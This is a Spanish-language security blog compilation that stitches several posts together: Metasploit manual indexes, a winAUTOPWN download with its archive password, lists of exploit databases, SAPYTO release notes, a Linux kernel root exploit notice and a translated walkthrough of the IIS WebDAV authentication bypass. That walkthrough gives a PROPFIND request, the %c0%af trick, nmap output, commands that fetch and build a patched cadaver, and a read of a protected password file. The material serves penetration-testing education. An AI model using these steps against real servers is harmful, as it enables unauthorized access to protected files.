Acabo de enterarme, que offensive-security los creadores BackTrack, han renovado totalmente su excelente y completo manual de MetaSploit Framework, el Framework por excelencia para desarrollar y ejecutar exploits.

La guía cubre desde los aspectos mas básicos que debes tener en cuenta a la hora de ejecutar Metasploit, como los requerimientos de tu maquina, pasando por su instalación, hasta tocar temas como la interacción con la herramienta, como programar sobre ella y como ejecutar tu propio exploit programado con este framework.

Para acceder a este curso de Metasploit Framework, solo es necesario contar con un navegador, internet y leer un poco de ingles técnico.

Ingresar al curso Online de Metasploit Framework

También puede interesarte...

• Manual de Metasploit Framework en Español
• Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB
• Prueba de Penetración en el Mundo Real
• Manual en español de Meterpreter
• ¿Cómo tomar control de un Dominio en Windows?
• Vídeo: Introducción al Metasploit Framework
• El reemplazo de Milw0rm
• Katana – Múltiples Distribuciones de Seguridad en tu USB

winAUTOPWN es una herramienta que nos permite automatizar ataques a entornos Windows, de forma simple y con un solo click (igual que en las películas).

El funcionamiento de winAUTOPWN no es complicado, primero escanea los puertos del puerto 1 al 65535 en busca de servicios activos en el sistema, si encuentra algún servicio, busca en su base de datos algún exploit para ese servicio e intenta explotarlo y si el ataque tiene éxito nos entrega una shell del sistema (fácil.. ¿no?).

Además de lo antes mencionado (que no es poco), winAUTOPWN nos ofrece las siguientes características:

• El escaneo de puertos es multi hilo (con el aumento en velocidad que esto representa)
• No se basa en el banner arrojado por el servicio (para evitar ser engañado por este)
• Incluye los exploits en binario para una gran cantidad de vulnerabilidades.

Los invito a probar esta herramienta que se actualiza constantemente y puede ahorrarnos mucho tiempo, si necesitamos testear la seguridad de muchas maquinas Windows.

Descargar winAUTOPWN 2.8

Password: w1n@ut0pw/|/

Mirror para La Comunidad DragonJAR

ADVERTENCIA, winAUTOPWN incluye exploits compilados que pueden ser detectados por tu software antivirus como malware o virus, pero es por la naturaleza misma de la aplicación; USALA BAJO TU PROPIA RESPONSABILIDAD

Para mas información:
Visita la pagina oficial de la herramienta winAUTOPWN

También puede interesarte...

• Video: Explotando WM Downloader
• Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB
• El Atacante Informático – Capítulo 4
• Amenazas de Agosto, Twitter protagonista
• Memorias del VI OWASP Spain Chapter Meeting
• ENDIAN una solución gratuita de seguridad perimetral
• reDoS – Denegación de Servicios con Expresiones Regulares
• Wireshark Portable

La traducción al español del manual de Metasploit Framework, esta publicado en formato WIKI (a diferencia que la original en ingles) y por lo cual podemos colaborar conjuntamente para tener pronto toda la guia “Metasploit Unleashed – Mastering the Framework” en nuestro idioma.

Este es el índice del manual de Metasploit Framwork que en su mayoría ya se encuentra traducido al español, gracias a la iniciativa de metasploit-es.com.ar.

Manual de Metasploit Framework en Español

• 1 Introducción
• 2 Materiales requeridos para el curso
  • 2.1 Requisitos de Hardware
  • 2.2 Ubuntu 7.04
  • 2.3 Windows XP SP2
    • 2.3.1 Archivos Requeridos
    • 2.3.2 Configurando VMware
    • 2.3.3 Post-Instalacion XP SP2
    • 2.3.4 Servicios Adicionales
    • 2.3.5 Crear una Aplicación Web Vulnerable
• 3 Interactuando con MSF
  • 3.1 msfconsule
  • 3.2 msfcli
  • 3.3 msfgui
  • 3.4 msfweb
• 4 Obteniendo Información
  • 4.1 El Framework Dradis
  • 4.2 Escaneo de Puertos
  • 4.3 Plugins Auxiliares
  • 4.4 Buscando MSSQL
  • 4.5 Identificación de Servicios
  • 4.6 Password Sniffing
    • 4.6.1 Ampliando Psnuffle
• 4.7 SNMP Sweeping
• 5 Analisis de Vulnerabilidades
  • 5.1 Verificacion de Login SMB
  • 5.2 Autentificacion VNC
  • 5.3 X11 a la escucha
  • 5.4 Escaner Web WMAP
  • 5.5 Trabajando con Nessus
• 6 Escribiendo un simple Fuzzer
  • 6.1 Simple Fuzzer TFTP
  • 6.2 Simple Fuzzer IMAP
• 7 Desarrullando Exploits
  • 7.1 Escribiendo un Exploit
    • 7.1.1 Obteniendo una Shell
  • 7.2 Usando el Egghunter-Mixin
    • 7.2.1 Completando el Exploit
  • 7.3 Shellcodes-alfanuméricas
• 8 Client-Side Exploits
  • 8.1 Payload binario
  • 8.2 Antivirus Bypass
  • 8.3 Troyanos Binarios para Linux
  • 8.4 Infeccion de aplicacion Java
  • 8.5 El ataque del lado del cliente
  • 8.6 Kit de herramientas de la ingeniería social
  • 8.7 Métodos infección VBScript
• 9 MSF Post Explotación
  • 9.1 Metasploit como un Payload
  • 9.2 PSExec Pass the Hash
  • 9.3 Administración de registros
  • 9.4 Jugando con Incognito
  • 9.5 Interactuando con el Registro
    • 9.5.1 Backdoor Netcat Persistente
    • 9.5.2 Habilitando Escritorio Remoto
  • 9.6 Packet Sniffing con Meterpreter
  • 9.7 Pivoting
  • 9.8 TimeStomp
  • 9.9 Captura de pantalla
• 10 Scripting en Meterpreter
  • 10.1 Estableciendo tu ambiente
  • 10.2 Escribiendo scripts meterpreter
  • 10.3 Custom Scipting
  • 10.4 Llamadas API utiles
  • 10.5 Funciones Utiles
• 11 Mantener el Acceso
  • 11.1 Keylogging
  • 11.2 Servicio de Meterpreter “Backdoor”
    • 11.2.1 Interactuar con Metsvc
• 12 MSF Uso Extendido
  • 12.1 Backdooring EXE files
  • 12.2 Browser Autopwn
  • 12.3 Karmetasploit
    • 12.3.1 Configuration
    • 12.3.2 Karmetasploit in Action
    • 12.3.3 Attack Analysis
  • 12.4 MSF vs OS X
  • 12.5 File-Uploads Backdoors
• 13 Fast-Track
  • 13.1 Modos de Fast-Track
  • 13.2 Actualizar Fast-Track
  • 13.3 MSSQL Injection
  • 13.4 MSSQL Bruter
  • 13.5 Binay to Hex Converter
  • 13.6 Mass-Client Attack
  • 13.7 SQL PWNAGE
  • 13.8 Payload Generator
• 14 Construyendo un Modulo
  • 14.1 Payloads a través de MSSQL
  • 14.2 Creando Nuestro Modulo Auxiliar
  • 14.3 The Guts Behind It
• 15 Dona Aqui
• 16 Glosario
  • 16.1 Modulos
  • 16.2 Recursos
  • 16.3 Un Poco sobre Payloads
• 17 FAQ
• 18 Sobre los Autores

Guia de usuario de Metasploit Framework en Español

• 1 Introducción
• 2 Instalación
  • 2.1 Instalación en Unix
  • 2.2 Instalación en Windows
  • 2.3 Advertencias Plataforma
  • 2.4 Sistemas operativos compatibles
  • 2.5 Actualización del Framework
• 3 Cómo empezar
  • 3.1 La interfaz de la consola
  • 3.2 La interfaz gráfica de usuario
  • 3.3 La interfaz de línea de comandos
  • 3.4 La interfaz Web
• 4 El almacén de datos
  • 4.1 Global DataStore
  • 4.2 Módulo DataStore
  • 4.3 Guardado DataStore
  • 4.4 Eficiencia del DataStore
  • 4.5 Variables DataStore
    • 4.5.1 LogLevel
    • 4.5.2 MsfModulePaths
• 5 Utilizando el Framework
  • 5.1 La elección de un módulo
  • 5.2 Módulos de Exploit
    • 5.2.1 Configurando el Exploit Activo
    • 5.2.2 Comprobación de las opciones de Exploit
    • 5.2.3 Selección de un destino
    • 5.2.4 Selección de Payload
    • 5.2.5 Lanzamiento del exploit
  • 5.3 Módulos auxiliares
    • 5.3.1 La ejecución de una tarea auxiliar
  • 5.4 Módulos de payload
    • 5.4.1 Generación de un Payload
  • 5.5 Nop Módulos
  • 5.6 Generación de un trineo NOP
• 6 Características avanzadas
  • 6.1 El Meterpreter
  • 6.2 PassiveX Carga
  • 6.3 Proxies conexión en cadena
  • 6.4 Win32 UploadExec Carga
  • 6.5 Win32 DLL de inyección de Carga
  • 6.6 VNC Server DLL Injection
• 7 Más Información
  • 7.1 Sitio Web
  • 7.2 Lista de correo
  • 7.3 Desarrolladores
• 8 A. Seguridad
  • 8.1 Interfaces de consola
  • 8.2 Interfaz Web
• 9 B. Consejos generales
  • 9.1 Tabulador
  • 9.2 Secure Socket Layer
• 10 C. Licencias

Manual de Metasploit Framework en Español

Mas Información:
Blog de Jhyx Traductor del Manual

También puede interesarte...

• Video Tutoriales de Metasploit Framework
• Manual en español de Meterpreter
• Vídeo: Introducción al Metasploit Framework
• Curso Completo de Metasploit Framework
• Dominando el Metasploit Framework
• DLL Hijacking con Metasploit
• Video Tutorial SET (Social Engineering Toolkit)
• Creando un Exploit Paso a Paso

Sin embargo WM Downloader en su versión  3.0.0.9 presenta algunos fallos de seguridad considerables, así lo demuestra DouBle Zer0 Zer0, en un vídeo donde nos  muestra como se puede explotar una vulnerabilidad de tipo “stack overflow” creando archivos m3u corruptos. A continuación el vídeo,  y el exploit lo pueden visualizar desde acá.

Mas Información:
WM Downloader (.M3U File) Local Stack Overflow POC
Pagina Oficial del WM Downloader

También puede interesarte...

• Todos los Vídeos de AntiChat – Parte I
• Todos los Vídeos de AntiChat – Parte II
• winAUTOPWN – Ataques automáticos de entornos Windows
• Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB
• SSDownloader – Gestor de descargas para Herramientas de Seguridad
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Vulnerabilidad 0-day en todas las versiones de Windows
• Detección de WebDAV, verificación de la vulnerabilidad y explotación

En esta ocasión les voy a hablar del que a mi parecer será el sucesor de milw0rm y continuara con el legado dejado por str0ke, se trata de explo.it un portal que pretende ser una base de datos de exploits como lo era milw0rm pero con algunos beneficios que listare a continuación:

1. Es mantenido por los desarrolladores de Ofensive Security, quienes nos han regalado ya alegrías como el famoso BackTrack.
2. El sistema de búsqueda ha sido mejorado.
3. Ahora es posible descargar la aplicación a la que afecta el exploit, dando click en la letra [A], incentivando aun mas la investigación de los fallos explotados.

Por estos motivos creo que explo.it es el nuevo Milw0rm y desde La Comunidad DragonJAR le damos todo el apoyo a este proyecto para que siga adelante, ¿conoces alguna otra alternativa? háznosla saber en los comentarios.

ACTUALIZADO:

Gracias al comentario de JiRuSoNu tenemos algunas otras alternativas

Exploits DB
http://www.expbase.com/
http://www.securelist.com/en/advisories/
http://www.hack0wn.com/
http://securityreason.com/exploit_alert
http://www.exploit-db.com/
http://nvd.nist.gov/
http://secunia.com/advisories/historic/
http://www.securityhome.eu/
http://www.security-database.com/
http://siomalabs.com/v/index.php/category/vulnerabilities/
http://osvdb.org/
http://ariko-security.com/index-7.html
http://www.packetstormsecurity.org/
http://www.nullbyte.org.il/

Buscadores de Exploits
http://sebug.net/
http://exploitsearch.com/

También puede interesarte...

• Curso Completo de Metasploit Framework
• BackTrack personalizado para La Comunidad DragonJAR
• Backtrack 5 Tutorial / Curso en Español
• winAUTOPWN – Ataques automáticos de entornos Windows
• Así fue el Hacking Day en Bogotá – Pentesting con Backtrack
• Actualizar BackTrack 5 a Backtrack 5 R1 sin reinstalar
• BackTrack 5 R1
• Nos vemos en Medellin!!

El artículo se encuentra en Inglés pero he decidido realizar la traducción para que nuestro público hispano también pueda tener acceso a este buen contenido. Se hace uso de la herramienta Nmap para detectar si el servidor es vulnerable y luego por medio de una versión de cadaver parcheada se realiza la explotación.

Detección de WebDAV, verificación de la vulnerabilidad y explotación

La primera cosa que deberías saber al jugar con esta vulnerabilidad es que el servidor IIS no es explotable sí el directorio raiz está protegido. También si el directorio raiz está protegido, no hay manera de determinar ni siquiera si WebDAV está activado. Siendo dicho eso, si el directorio raiz _no_ está protegido entonces es hora de divertirnos un poco.

Detectando sí WebDAV está activado

Las pruebas han sido realizadas en:

• IIS 6.0/Windows 2003 Enterprise SP2
• IIS 5.1/Windows XP Pro SP2
• IIS 5.0/Windows 2000 SP4

En IIS 6-.0, WebDAV está desactivado por defecto. En IIS 5.0 y 5.1, WebDAV está activado por defecto y se debe editar el registro para desactivarlo.

Mi método de detección simplista requiere de ejecutar una petición PROPFIND en el servidor. Básicamente es la misma petición PROPFIND usada en el script http-iis-webdav-vuln.nse:

PROPFIND / HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: application/xml
Content-Length: 298

<?xml version=”1.0″ encoding=”utf-8″?>
<propfind xmlns=”DAV:”>
<prop>
<getcontentlength xmlns=”DAV:”/>
<getlastmodified xmlns=”DAV:”/>
<executable xmlns=”http://apache.org/dav/props/”/>
<resourcetype xmlns=”DAV:”/>
<checked-in xmlns=”DAV:”/>
<checked-out xmlns=”DAV:”/>
</prop>
</propfind>

Cuando WebDAV está activado, debería devolver “HTTP/1.1 207 Multi-Status”.
Cuando WebDAV ha sido desactivado, debería retornar “HTTP/1.1 501 Not Supported”.

Éste es el método que he implementado en el script http-iis-webdav-vuln.nse. Funciona muy bien en el laboratorio con los servidores IIS. Si recibimos alguna otra cosa diferente a 207 o 501 entonces abordamos el barco diciendo que el servidor no está soportado. Por otrolado, un servidor Aparche corriendo sobre Ubuntu devolvería un 405 Method Not Allowed.

Verificando si un servidor es vulnerable

Las pruebas han sido realizadas en:

• IIS 6.0/Windows 2003 Enterprise SP2
• IIS 5.1/Windows XP Pro SP2

No funciona en:

• IIS 5.0/Windows 2000 SP4

El script original sólo usaba un forma para verificar; primero encontraría un directorio protegido (/secret/) y luego probaría intentando el caracter %c0%af después del primer /. Entonces /secret/ se convertiría en /%c0%afsecret/.

Funcionó muy bien en IIS 6.0 pero no funcionó del todo en IIS 5.0/5.1. Después jugar un poco más hoy con esto, logramos hacerlo funcionar en IIS 5.1. El problema con el 5.1 es que el caracter %c0%af no puede estar justo antes de / pero sí en alguna parte entre el nombre del directorio. También funcionó en IIS 6.0. Modifiqué el script de manera que usara la verificación de IIS 5.0/6.0, convirtiendo /secret/ en /s%c0%afecret/.

Encontrando un servidor vulnerable

Las pruebas han sido realizadas en:

• IIS 6.0/Windows 2003 Enterprise SP2
• IIS 5.1/Windows XP Pro SP2

No funciona en:

• IIS 5.0/Windows 2000 SP4

Ahora vamos a la parte divertida. Si hasta ahora no te has divertido, vete preparando por que ya casi llegamos!

Lo primero que necesitamos hacer es encontrar un servidor vulnerable. Sólo llegué a saber de un Windows 2003 en mi laboratorio corriendo IIS 6.0 que es vulnerable (actualizado y parcheado hasta la fecha). Veamos funciona como un escaneo con nmap en este sistema con el script actualizado:

> ./nmap -T4 -p80 –script=http-iis-webdav-vuln xxx.xxx.xxx.xxx

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDT
Interesting ports on xxx.xxx.xxx.xxx:
PORT   STATE SERVICE
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdav

Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds

Interesante! Ahora sabemos que el servidor tiene WebDAV activado y hay 3 directorios vulnerables.

Explotándolo!

Ahora podríamos hacer lo que sea haciendo uso de telnet por el puerto 80, pero no es muy divertido (creeme, es muy tedioso!) así que busqué un cliente WebDAV. Me tropecé con un software libre llamado cadaver, y basado únicamente en el nombre lo descargué. Cadaver por sí mismo es un gran cliente WebDAV de línea de comandos pero rápidamente me dí cuenta que tiene un montón de problemas que no nos dejarían hacer lo que queríamos. Lo bueno del software libre es que es abierto, así que descargué el código fuente de cadaver-0.23.2 y después de modificarlo un poco, resultamos con un pequeño parche que hace bastante sencillo explotar un servidor. Revisa el parche por ti mismo para ver detalles a fondo pero básicamente hace lo siguiente:

1. Reemplazar cualquier cabecera “Depth: 0″ por “Depth: 1″ (de otro modo LS no funcionaría)
2. Agregar la cabecera “Translate: f” a cada petición (de otra manera GET y probablemente otros no funcionarían.
3. Insertar los caracteres “%c0%af” en cualquier petición con más de 1 caracter.

Así que baja el parche cadaver-0.23.2-h4x.patch y apĺícalo a la fuentes de cadaver-0.23.2 desde el sitio web de cadaver. Aquí están los comandos:


> mkdir cadaver-h4x
> cd cadaver-h4x
> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
–recortado–
> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
–recortado–
> tar xzvf cadaver-0.23.2.tar.gz
–recortado–
> cd cadaver-0.23.2/
> patch -p1 < ../cadaver-0.23.2-h4x.patch
patching file lib/neon/ne_basic.c
patching file lib/neon/ne_request.c
patching file lib/neon/ne_uri.c
> ./configure
–recortado–
> make
–recortado–

Ahora deberíamos de tener una versión parcheada y compilada de cadaver. Iníciala con el servidor que habías identificado con directorios vulnerables anteriormente:

> ./cadaver xxx.xxx.xxx.xxx

Esto debería de dejarte en un prompt con “dav:/>”. Ahora simplemente haz cd al directorio vulnerable y verifica que hay ahí:


dav:/> cd secret
dav:/secret/> ls
Listing collection `/secret/’: succeeded.
password.txt                           7  May 19 10:40
dav:/secret/> cat password.txt
Displaying `/secret/password.txt’:
ron$pr0ns
dav:/secret/>

Y ahí lo tienes!

Aquí tienes una lista de comandos que he probado y funcionan con cadaver parcheado en un directorio vulnerable:

• CD
• LS
• MOVE
• PUT
• GET
• CAT
• DELETE

Curiosamente, el comando COPY no funciona. No hemos tenido tiempo para investigar por, pero la funcionalidad puede ser duplicada con un get/local rename/put.

Este cadaver parcheado tampoco funcionará para examinar directorios WebDAV regulares (no vulnerables), así que no intentes.

También puede interesarte...

• Video: Explotando WM Downloader
• Vulnerabilidad 0-day en todas las versiones de Windows
• Parches para Windows que corrigen Vulnerabilidades Criticas
• Denegacion de Servicio desde el WordPad
• Actualiza tu equipo con Windows
• Video Tutorial de Nessus y Baseline Security Analyzer
• Microsoft Publica parche que corrige Vulnerabilidad “Critica”
• winAUTOPWN – Ataques automáticos de entornos Windows

Esta versión es principalmente un completo rediseño de sapyto tanto su núcleo como su arquitectura ha sido modificado para facilitar el soporte a futuras versiones. Algunas de las nuevas características son:

• Objetivo de configuración se basa ahora en “conectores”, que representan diferentes maneras de comunicarse con los servicios y componentes de SAP.
• Los plugins son ahora dividido en tres categorías: Descubrir, Auditar y Explotar.
• Los plugins exploits ahora generan shell´s y/o sapyto Agent objects.
• Nuevos plugins!: Fuerza Bruta a cuenta de usuario, enumeración de clientes, evaluación de SAProuter y más …
• Desarrollador Plugin´s ahora es mas fácil, la interface se ha simplificado y mejorado drásticamente.
• Proceso de instalación y documentación general mejorado.

Para Más Información:
Página Oficial del SAPYTO
SAPYTO – Framework para realizar Penetration Tests sobre sistemas SAP

También puede interesarte...

• winAUTOPWN – Ataques automáticos de entornos Windows
• ¿Cómo se realiza un Pentest?
• Memorias del VI OWASP Spain Chapter Meeting
• Hakin9 Español GRATIS
• Manual en español de Meterpreter
• Manual de Metasploit Framework en Español
• Video: Explotando WM Downloader
• Vídeo: Introducción al Metasploit Framework

Una nueva vulnerabilidad que afecta las versiones del kernel de linux 2.6.17 hasta el 2.6.2.4.1 ha salido a la luz, este fallo permite obtener permisos de root por lo que la vulnerabilidad es GRAVE y es recomendable que apliques el parche que soluciona este fallo tan pronto puedas hacerlo.

Muchas distribuciones se han visto afectadas, desde Ubuntu Gutsy hasta openSuSE 10.2/10.3, es recomendable que pruebes el exploit en tu distro para que verifiques si eres vulnerable (si no lo eres prueba con el segundo exploit que han publicado antes de cantar victoria), de ser así puedes usar el sistema de actualizaciones de tu distribución o parchearlo manualmente.

Para compilar el exploit basta con descargarlo y compilarlo con gcc (gcc exploit.c -o exploit) y luego ejecutarlo ./exploit (tal como se muestra en la imagen de arriba).

Otras personas que hablan del fallo, Cronopio, Kriptopolis y Magarto.

También puede interesarte...

• BackTrack 5
• Descargar BackTrack 4 R1
• Video: Explotando WM Downloader
• SeguriSemanal III
• Detección de WebDAV, verificación de la vulnerabilidad y explotación
• Nuevo Gusano Infecta Routers, Modems, y Sistemas GNU Linux
• Hacking de Redes UPnP – Parte III
• Hacking de Redes UPnP – Parte II